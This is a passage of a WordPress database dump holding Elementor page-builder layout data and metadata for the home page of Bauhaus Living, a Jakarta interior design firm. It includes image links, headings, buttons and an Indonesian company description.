\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4172,4913,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4173,4913,'_elementor_pro_version','3.8.1'),(4174,4913,'_elementor_css','a:6:{s:4:\"time\";i:1695375026;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:3:{i:0;s:0:\"\";i:1;s:7:\"ovaicon\";i:4;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4175,4914,'_wp_page_template','elementor_header_footer'),(4176,4914,'_elementor_edit_mode','builder'),(4177,4914,'_elementor_template_type','wp-page'),(4178,4914,'_elementor_version','3.8.1'),(4179,4914,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Let\'s turn your ideas into reality\\\"<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor 